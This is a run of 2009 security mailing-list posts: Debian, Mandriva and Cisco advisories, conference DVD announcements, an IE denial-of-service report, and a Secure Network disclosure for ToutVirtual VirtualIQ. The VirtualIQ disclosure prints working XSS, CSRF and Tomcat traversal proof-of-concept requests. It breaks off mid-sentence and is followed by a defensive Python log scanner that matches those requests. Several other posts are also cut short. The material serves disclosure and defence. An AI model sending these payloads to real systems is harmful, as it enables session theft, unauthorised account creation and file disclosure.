[SECURITY] [DSA 1930-1] New drupal6 packages fix several vulnerabilities
------------------------------------------------------------------------
Debian Security Advisory DSA-1930-1
secur...@debian.org
http://www.debian.org/security/
Steffen Joeris
November 07, 2009
http://www.debian.org/security/faq
------------------------------------------------------------------------

Package        : drupal6
Vulnerability  : several vulnerabilities
Problem type   : remote
Debian-specific: no
CVE IDs        : CVE-2009-2372 CVE-2009-2373 CVE-2009-2374
Debian Bug     : 535435 547140

Several vulnerabilities have been found in drupal6, a fully-featured content management framework. The Common Vulnerabilities and Exposures project identifies the following problems:

CVE-2009-2372

  Gerhard Killesreiter discovered a flaw in the way user signatures are handled. It is possible for a user to inject arbitrary code via a crafted user signature. (SA-CORE-2009-007)

CVE-2009-2373

  Mark Piper, Sven Herrmann and Brandon Knight discovered a cross-site scripting issue in the forum module, which could be exploited via the tid parameter. (SA-CORE-2009-007)

CVE-2009-2374

  Sumit Datta discovered that certain drupal6 pages leak sensitive information such as user credentials. (SA-CORE-2009-007)

Several design flaws in the OpenID module have been fixed, which could lead to cross-site request forgeries or privilege escalations. Also, the file upload function does not process all extensions properly, leading to the possible execution of arbitrary code. (SA-CORE-2009-008)

For the stable distribution (lenny), these problems have been fixed in version 6.6-3lenny3.

The oldstable distribution (etch) does not contain drupal6.

For the testing distribution (squeeze) and the unstable distribution (sid), these problems have been fixed in version 6.14-1.

We recommend that you upgrade your drupal6 packages.

Upgrade instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.
If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 5.0 alias lenny
--------------------------------

Debian (stable)
---------------

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/d/drupal6/drupal6_6.6-3lenny3.dsc
    Size/MD5 checksum: 1130 489d56336053311b1ee24aaf17f41ffb
  http://security.debian.org/pool/updates/main/d/drupal6/drupal6_6.6-3lenny3.diff.gz
    Size/MD5 checksum: 24870 d70dfad8a6f211cb9dd62e071e5ddfd9
  http://security.debian.org/pool/updates/main/d/drupal6/drupal6_6.6.orig.tar.gz
    Size/MD5 checksum: 1071507 caaa55d1990b34dee48f5047ce98e2bb

Architecture independent packages:

  http://security.debian.org/pool/updates/main/d/drupal6/drupal6_6.6-3lenny3_all.deb
    Size/MD5 checksum: 1088258 6162b6933d636065c6a07e6f6199c7df

These files will probably be moved into the stable distribution on its next update.

------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-annou...@lists.debian.org
Package info: `apt-cache show pkg' and http://packages.debian.org/pkg
[SECURITY] [DSA 1932-1] New pidgin packages fix arbitrary code execution
------------------------------------------------------------------------
Debian Security Advisory DSA-1932-1
secur...@debian.org
http://www.debian.org/security/
Moritz Muehlenhoff
November 08, 2009
http://www.debian.org/security/faq
------------------------------------------------------------------------

Package        : pidgin
Vulnerability  : programming error
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2009-3615

It was discovered that incorrect pointer handling in the purple library, an internal component of the multi-protocol instant messaging client Pidgin, could lead to denial of service or the execution of arbitrary code through malformed contact requests.

For the stable distribution (lenny), this problem has been fixed in version 2.4.3-4lenny5.

For the unstable distribution (sid), this problem has been fixed in version 2.6.3-1.

We recommend that you upgrade your pidgin package.

Upgrade instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 5.0 alias lenny
--------------------------------

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.
[ MDVSA-2009:295 ] apache
_______________________________________________________________________

Mandriva Linux Security Advisory MDVSA-2009:295
http://www.mandriva.com/security/
_______________________________________________________________________

Package : apache
Date    : November 8, 2009
Affected: 2009.0, 2009.1, 2010.0, Corporate 3.0, Corporate 4.0, Enterprise Server 5.0, Multi Network Firewall 2.0
_______________________________________________________________________

Problem Description:

A vulnerability was discovered and corrected in apache:

Apache is affected by SSL injection or man-in-the-middle attacks due to a design flaw in the SSL and/or TLS protocols. A short term solution was released Sat Nov 07 2009 by the ASF team to mitigate these problems. Apache will now reject in-session renegotiation (CVE-2009-3555).

Additionally the SNI patch was upgraded for 2009.0/MES5 and 2009.1.

This update provides a solution to this vulnerability.
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3555
http://marc.info/?l=apache-httpd-announce&m=125755783724966&w=2
_______________________________________________________________________

Updated Packages:
FRHACK01 DVDs
Hi list,

FRHACK01, International IT Security Conference, was held in Besancon, France - http://www.frhack.org

FRHACK was not commercial, but technical. We decided to sell DVDs of the conference to cover our expenses.

If anyone has a problem with this, with FRHACK or with me = he's invited to contact me directly and we should be able to speak about it in an eyes2eyes way, like men.

If u just want to flame on your blog, just go in hell.

Anyway, so here it is, the first 2 DVDs of FRHACK available for FREE:

http://www.frhack.org/frhack01_dvd01.iso
http://www.frhack.org/frhack01_stallman.avi

Enjoy

/JA

RIP mil
I never forget my brothers
ToutVirtual VirtualIQ Multiple Vulnerabilities
Secure Network - Security Research Advisory

Vuln name: ToutVirtual VirtualIQ Pro Multiple Vulnerabilities
Systems affected: ToutVirtual VirtualIQ Professional 3.2 build 7882
Systems not affected: --
Severity: High
Local/Remote: Remote
Vendor URL: http://www.toutvirtual.com
Author(s): Alberto Trivero (a.triv...@securenetwork.it)
           Claudio Criscione (c.crisci...@securenetwork.it)
Vendor disclosure: 02/07/2009
Vendor acknowledged: 16/07/2009
Vendor patch release: notified us on 06/11/2009
Public disclosure: 07/11/2009
Advisory number: SN-2009-02
Advisory URL: http://www.securenetwork.it/advisories/sn-2009-02.txt

*** SUMMARY ***

ToutVirtual's VirtualIQ Pro is specifically designed for IT administrators responsible for managing virtual platforms. VirtualIQ Pro provides Visibility, Analytics and policy-based Optimization - all from one single console. VirtualIQ Pro is hypervisor-agnostic supporting both Type I and Type II hypervisors. VirtualIQ Pro can be used to visualize, analyze and optimize your choice of virtualization platform - Citrix, Microsoft, Novell, Oracle and/or VMware.

Multiple vulnerabilities have been found which allow an attacker to conduct various XSS and CSRF attacks, and other attacks due to the use of an old and not hardened version of the web server.

*** VULNERABILITY DETAILS ***

(a) Cross-site scripting (XSS)

Due to improper sanitization of user input, multiple XSS attacks (reflective and stored) are possible.
Reflective PoCs:

http://server:9080/tvserver/server/user/setPermissions.jsp?userId=1;scriptalert(1)/script&resultresourceids=111-222-1933em...@address.tst

http://server:9080/tvserver/server/user/addDepartment.jsp?addNewDept=0&deptName=%22;alert(1);//&deptId=1&deptDesc=asd

http://server:9080/tvserver/server/inventory/inventoryTabs.jsp?ID=1;alert(1);//

http://server:9080/tvserver/reports/virtualIQAdminReports.do?command=getFilter&reportName=%22%3E%3Cscript%3Ealert(1)%3C/script%3E

Stored XSS attacks can be triggered in the Middle Name parameter in the Edit Profile page with an HTTP request like the following:

POST /tvserver/user/user.do?command=saveuserId=1 HTTP/1.1
Host: server:9080
Cookies: JSESSIONID=[...]

userName=IQMANAGERfirstName=IQmiddleName=asd'; alert(document.cookie);//lastName=MANAGERemail=user%40domain.itpassword=retypePassword=redirect=nullpasswordModifed=falseisReportUser=falseroleId=1supervisorId=1departmentId=1locationId=1

(b) Cross-site request forgery (CSRF)

An attacker can perform different types of CSRF attacks against a logged-in user. He can, for example, shut down, start or restart an arbitrary virtual machine, schedule new activities and so on.

The following HTTP request, if forged by the attacker and executed by the victim while logged on to VirtualIQ, creates an arbitrary user:

POST /tvserver/user/user.do?command=saveuserId= HTTP/1.1
Host: server:9080
Cookie: JSESSIONID=[...]

userName=asd1firstName=asd2middleName=asd3lastName=asd4email=asd5%40asd.compassword=asd6retypePassword=asd6redirect=nullpasswordModifed=falseisReportUser=falseroleId=1supervisorId=1departmentId=1locationId=1

(c) Web server vulnerabilities

VirtualIQ runs on top of an old version of Apache Tomcat: 5.5.9, for which multiple public vulnerabilities have been released.
As a PoC, a directory traversal attack (CVE-2008-2938) can be performed as:

http://server:9080/tvserver/server/%C0%AE%C0%AE/WEB-INF/web.xml

Listing of an arbitrary directory (CVE-2006-3835) can also be obtained with the following PoC:

http://192.168.229.85:9080/tvserver/server/;index.jsp

(d) Information Leakage

Tomcat status page should be disabled or restricted, being accessible at:

http://status:9080/status

Username and password to access a VM through SSH are also available in clear text in the configuration page. Since an XSS vulnerability can also be triggered in the same page, an attacker would also be able to easily capture the full credentials to access the VM with a specially crafted XSS payload.

(e) Remote code execution

JBoss JMX Management Console is exposed and can be used by remote attackers to execute arbitrary commands on the system:

http://server:9080/jmx-console/

JBoss Web Console is exposed as well and can be used by remote attackers to execute any command on the system:

http://server:9080/web-console/

*** EXPLOIT ***

Attackers may exploit these issues through a common browser as explained above.

*** FIX INFORMATION ***

Upgrade to the latest version, at the moment 3.5 build 10.14.2009

*** WORKAROUNDS ***

--

*** LEGAL NOTICES ***

Secure Network (www.securenetwork.it) is an information security company, which provides consulting and training services, and engages in security research and development. We are committed to open, full disclosure of vulnerabilities, cooperating whenever possible with software developers for properly handling disclosure. This advisory is
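A defender-side check for the request patterns listed in sections (a) and (c) to (e) of the advisory above, as an added example that is not part of the original advisory or of any vendor tooling. It assumes access logs in Common Log Format; the rule labels, function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Overlong UTF-8 encoding of "." used for traversal (CVE-2008-2938 pattern).
_OVERLONG_DOT = re.compile(r"%c0%ae", re.IGNORECASE)
# ";name.jsp" path parameter directly after a slash (CVE-2006-3835 pattern).
_PATH_PARAM_JSP = re.compile(r"/;[^/?]*\.jsp", re.IGNORECASE)
# Management and status endpoints the advisory reports as exposed.
_ADMIN_PREFIXES = ("/jmx-console", "/web-console", "/status")
# Script fragments that should never appear in a decoded query string.
_SCRIPT_MARKERS = ("<script", "alert(", "document.cookie")

# Common Log Format: host ident user [time] "METHOD target PROTO" status size
_CLF = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def classify(target):
    """Return the list of rule labels that a request target matches."""
    findings = []
    parts = urlsplit(target)
    path = parts.path.lower()
    if _OVERLONG_DOT.search(target):
        findings.append("overlong-utf8-traversal")
    if _PATH_PARAM_JSP.search(path):
        findings.append("path-parameter-listing")
    # Match the prefix only on a path-segment boundary, so that
    # "/statusboard" is not reported as "/status".
    if any(path == p or path.startswith(p + "/") for p in _ADMIN_PREFIXES):
        findings.append("management-console-access")
    decoded_query = unquote(parts.query).lower()
    if any(marker in decoded_query for marker in _SCRIPT_MARKERS):
        findings.append("script-in-parameter")
    return findings


def scan(lines):
    """Return (line_no, client_ip, status, findings) for each suspicious line."""
    hits = []
    for line_no, line in enumerate(lines, 1):
        match = _CLF.match(line)
        if not match:
            continue  # not a CLF request line
        findings = classify(match.group("target"))
        if findings:
            hits.append((line_no, match.group("ip"),
                         int(match.group("status")), findings))
    return hits


# Constructed sample log lines (documentation address ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [09/Nov/2009:10:00:01 +0000] "GET /tvserver/server/%C0%AE%C0%AE/WEB-INF/web.xml HTTP/1.1" 200 5120',
    '192.0.2.10 - - [09/Nov/2009:10:00:05 +0000] "GET /tvserver/server/;index.jsp HTTP/1.1" 200 2048',
    '198.51.100.7 - - [09/Nov/2009:10:01:00 +0000] "GET /jmx-console/ HTTP/1.1" 200 9000',
    '198.51.100.7 - - [09/Nov/2009:10:01:30 +0000] "GET /tvserver/reports/virtualIQAdminReports.do?command=getFilter&reportName=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 700',
    '203.0.113.5 - - [09/Nov/2009:10:02:00 +0000] "GET /tvserver/server/inventory/inventoryTabs.jsp?ID=1 HTTP/1.1" 200 4300',
    '203.0.113.5 - - [09/Nov/2009:10:02:10 +0000] "GET /statusboard/index.jsp HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A 200 status on any of these hits deserves priority, since it suggests the server answered the request rather than rejecting it.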
DoS vulnerability in Internet Explorer
Hello Bugtraq!

I want to warn you about Denial of Service vulnerability in Internet Explorer. Yesterday I already informed Microsoft.

This attack I called DoS via homepage.

DoS:

http://websecurity.com.ua/uploads/2009/IE%20DoS%20Exploit10.html

With this exploit in IE6 the browser blocks, so it's become impossible to use it and it's only possible to close it (via Task Manager). With this exploit in IE7 the browser freezes after click on the link.

Vulnerable versions are Internet Explorer 6 (6.0.2900.2180), Internet Explorer 7 (7.0.6000.16711) and previous versions (and possible next versions too).

I mentioned about this vulnerability at my site (http://websecurity.com.ua/3658/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
Re: DoS vulnerability in Internet Explorer
Not sure if this matters or not but it also worked on blackberry browser on blackberry 8800.

Regards.

-----Original Message-----
From: MustLive
To: bugtraq@securityfocus.com
Sent: Nov 8, 2009 8:54 AM
Subject: DoS vulnerability in Internet Explorer

Hello Bugtraq!

I want to warn you about Denial of Service vulnerability in Internet Explorer. Yesterday I already informed Microsoft.

This attack I called DoS via homepage.

DoS:

http://websecurity.com.ua/uploads/2009/IE%20DoS%20Exploit10.html

With this exploit in IE6 the browser blocks, so it's become impossible to use it and it's only possible to close it (via Task Manager). With this exploit in IE7 the browser freezes after click on the link.

Vulnerable versions are Internet Explorer 6 (6.0.2900.2180), Internet Explorer 7 (7.0.6000.16711) and previous versions (and possible next versions too).

I mentioned about this vulnerability at my site (http://websecurity.com.ua/3658/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Sent via BlackBerry from T-Mobile
Cisco Security Advisory: Transport Layer Security Renegotiation Vulnerability
Cisco Security Advisory: Transport Layer Security Renegotiation Vulnerability

Advisory ID: cisco-sa-20091109-tls

http://www.cisco.com/warp/public/707/cisco-sa-20091109-tls.shtml

Revision 1.0

For Public Release 2009 November 9 1600 UTC (GMT)

Summary
=======

An industry-wide vulnerability exists in the Transport Layer Security (TLS) protocol that could impact any Cisco product that uses any version of TLS and SSL. The vulnerability exists in how the protocol handles session renegotiation and exposes users to a potential man-in-the-middle attack.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20091109-tls.shtml.

Affected Products
=================

Cisco is currently evaluating products for possible exposure to these TLS issues. Products will only be listed in the Vulnerable Products or Products Confirmed Not Vulnerable sections of this advisory when a final determination about product exposure is made. Products that are not listed in either of these two sections are still being evaluated.

Vulnerable Products
-------------------

This section will be updated when more information is available.

Products Confirmed Not Vulnerable
---------------------------------

The following products are confirmed not vulnerable:

  * Cisco AnyConnect VPN Client

This section will be updated when more information is available.

Details
=======

TLS and its predecessor, SSL, are cryptographic protocols that provide security for communications over IP data networks such as the Internet. An industry-wide vulnerability exists in the TLS protocol that could impact any Cisco product that uses any version of TLS and SSL. The vulnerability exists in how the protocol handles session renegotiation and exposes users to a potential man-in-the-middle attack.

The following Cisco Bug IDs are being used to track potential exposure to the SSL and TLS issues. The bugs listed below do not confirm that a product is vulnerable, but rather that the product is under investigation by the appropriate product teams.
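Registered Cisco customers can view these bugs via Cisco's Bug Toolkit: http://www.cisco.com/pcgi-bin/Support/Bugtool/launch_bugtool.pl

+------------------------------+--------------+
| Product                      | Bug ID       |
+------------------------------+--------------+
| Cisco Adaptive Security      | CSCtd01491   |
| Device Manager (ASDM)        |              |
+------------------------------+--------------+
| Cisco AON Software           | CSCtd01646   |
+------------------------------+--------------+
| Cisco AON Healthcare for     | CSCtd01652   |
| HIPAA and ePrescription      |              |
+------------------------------+--------------+
| Cisco Application and        | CSCtd01529   |
| Content Networking System    |              |
| (ACNS) Software              |              |
+------------------------------+--------------+
| Cisco Application            | CSCtd01480   |
| Networking Manager           |              |
+------------------------------+--------------+
| Cisco ASA 5500 Series        | CSCtd00697   |
| Adaptive Security            |              |
| Appliances                   |              |
+------------------------------+--------------+
| Cisco ASA Advanced           | CSCtd01539   |
| Inspection and Prevention    |              |
| (AIP) Security Services      |              |
| Module                       |              |
+------------------------------+--------------+
| Cisco AVS 3100 Series        | CSCtd01566   |
| Application Velocity         |              |
| System                       |              |
+------------------------------+--------------+
| Cisco Catalyst 6500 Series   | CSCtd06389   |
| SSL Services Module          |              |
+------------------------------+--------------+
| Firewall Services Module     | CSCtd04061   |
| FWSM                         |              |
+------------------------------+--------------+
| Cisco CSS 11000 Series       | CSCtd01636   |
| Content Services Switches    |              |
+------------------------------+--------------+
| Cisco Unified SIP Phones     | CSCtd01446   |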
Re: FRHACK01 DVDs
New CC number, have to update account information, blablabla... SORRY

Here it is for now:

https://free-security.org/frhack/frhack01_dvd01.iso
https://free-security.org/frhack/frhack01_stallman.avi

/JA

C0m3 b...@ck s00n mi1 ;p